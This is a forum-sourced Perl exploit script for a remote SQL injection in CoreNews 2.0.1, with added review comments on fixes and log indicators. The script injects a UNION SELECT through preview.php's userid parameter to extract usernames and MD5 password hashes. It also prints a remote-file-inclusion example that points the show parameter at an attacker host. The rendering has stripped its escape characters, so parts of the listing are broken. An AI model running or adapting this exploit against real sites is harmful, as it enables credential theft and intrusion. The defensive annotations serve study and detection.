Screech

CoreNews 2.0.1


Download tut: http://rapidshare.de/files/24936927/core_n..._2.0.1.rar.html

Search:

Powered by CoreNews 2.0.1

Exploit:

#!/usr/bin/perl

#Method found & Exploit scripted by nukedx

#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com

#Original advisory: http://www.nukedx.com/?viewdoc=24

#Usage: corenews.pl <host> <path>

use IO::Socket;

# Entry dispatch: exactly two command-line arguments (<host> <path>) run the
# main routine; any other count prints the usage text and exits.
if (scalar(@ARGV) == 2) {
    exploit();
}
else {
    usage();
}

# Print the two-line advisory banner that precedes all other output.
sub header()
{
    # Strings are reproduced exactly as listed. The bare "n"/"rn" runs look
    # like "\n"/"\r\n" escapes whose backslash was lost when the post was
    # rendered -- left untouched here.
    print "n- NukedX Security Advisory Nr.2006-24rn",
          "- CoreNews <= 2.0.1 Remote SQL Injection Exploitrn";
}

# Print the banner followed by the command-line synopsis, then terminate.
# Reached from the top-level dispatch when the argument count is not two.
sub usage()
{
    header();

    # $0 interpolates to the script name as invoked.
    my @synopsis_lines = (
        "- Usage: $0 <host> <path>rn",
        "- <host> -> Victim's host ex: http://www.victim.comrn",
        "- <path> -> Path to CoreNews ex: /corenews/rn",
    );
    foreach my $synopsis_line (@synopsis_lines) {
        print $synopsis_line;
    }

    exit();
}

# exploit(): builds a single HTTP GET for preview.php carrying a UNION SELECT
# in the `userid` query parameter, sends it over a raw TCP socket to port 80,
# and scans the response line by line for a delimited login/password pair.
# Exits on the first match; otherwise prints a failure message.
#
# NOTE(review): the listing appears to have lost its backslashes when the
# forum rendered it ("rn"/"n" where "\r\n"/"\n" were presumably written, the
# unescaped slashes in the s/// below, "[d,a-f]" in the response regex), so it
# is not valid Perl as shown. The code is left exactly as posted.
#
# Defender summary: the request implies that preview.php places `userid` into
# a SQL statement without validation or parameter binding. The application-side
# fix is to bind `userid` as a query parameter or cast it to an integer before
# use, and to reject non-numeric values outright.
sub exploit ()

{

#Our variables...
# All of these are package globals: the script has no `use strict` and no `my`.

# Host argument, taken from the command line without validation.
$cnserver = $ARGV[0];

# Intended to strip a leading scheme so the bare host can be used as PeerAddr.
# NOTE(review): as rendered, the slashes inside the pattern are unescaped, so
# this line does not parse; the /e flag would also be unnecessary for an empty
# replacement.
$cnserver =~ s/(http://)//eg;

$cnhost = "http://".$cnserver;

# Application path argument, also taken verbatim from the command line.
$cndir = $ARGV[1];

# Fixed to plain HTTP on port 80; there is no TLS or alternate-port handling.
$cnport = "80";

# Endpoint and parameter named by the advisory as the injection point.
$cntar = "preview.php?userid=";

# Injected value: a UNION SELECT with six columns whose second column is
# concat() of `login` and `password` from `corenews_users`, wrapped in the
# numeric markers 2022 / 20223 / 2203 that the response regex below looks for.
# `/**/` stands in for spaces; the trailing `/*` is presumably there to comment
# out the remainder of the original query.
# Detection: a legitimate `userid` is presumably a plain integer, so a value
# containing `UNION`, `/**/` or the table name `corenews_users` is a
# high-confidence signal in web-server logs or WAF rules.
$cnxp = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*";

# Full request target: scheme + host + path + endpoint + injected value.
# It is sent in absolute form on the GET line below.
$cnreq = $cnhost.$cndir.$cntar.$cnxp;

#Sending data...

header();

print "- Trying to connect: $cnserverrn";

# Plain TCP connection to the host on $cnport; dies if the socket cannot be
# created. No timeout is set.
$cn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cnserver", PeerPort => "$cnport") || die "- Connection failed...n";

# Hand-written request with a fixed header set. The static values
# ("Accept-Language: tr", the "NukeZilla" User-Agent, a Referer equal to the
# site root) are usable as log indicators for unmodified copies of this
# script, though each is trivially changed.
print $cn "GET $cnreq HTTP/1.1n";

print $cn "Accept: */*n";

print $cn "Referer: $cnhostn";

print $cn "Accept-Language: trn";

print $cn "User-Agent: NukeZillan";

print $cn "Cache-Control: no-cachen";

print $cn "Host: $cnservern";

print $cn "Connection: closenn";

print "- Connected...rn";

# Read the response one line at a time until the server closes the connection.
while ($answer = <$cn>) {

# Looks for the marker-delimited pair produced by concat() above: group 1 is
# the login, group 2 is a 32-character run from the class shown.
# NOTE(review): "[d,a-f]" is presumably "[\d,a-f]" with the backslash lost.
if ($answer =~ /2022(.*?)20223([d,a-f]{32})2203/) {

print "- Exploit succeed!rn";

print "- Username: $1rn";

# NOTE(review): the label and the 32-character match suggest the application
# stores passwords as unsalted MD5 -- confirm against the schema. A salted,
# deliberately slow password hash limits what a leaked row is worth.
print "- MD5 HASH of PASSWORD: $2rn";

# The next two messages refer to a separate issue, remote file inclusion
# through the `show` parameter; this script never sends such a request.
# Application-side hardening for that class: never pass request parameters to
# an include, and keep PHP's allow_url_include disabled.
print "- If you crack hash you can use RFI with example ->rn";

print "- Example: $cnhost$cndir?show=http://yourhost.com/file.txtrn";

exit();

}

}

#Exploit failed...
# Reached only when no response line matched the marker pattern.
# The missing semicolon is legal Perl for the last statement in a block.

print "- Exploit failedn"

# The "[/list:u]" after the closing brace is forum markup residue, not Perl.
}[/list:u]
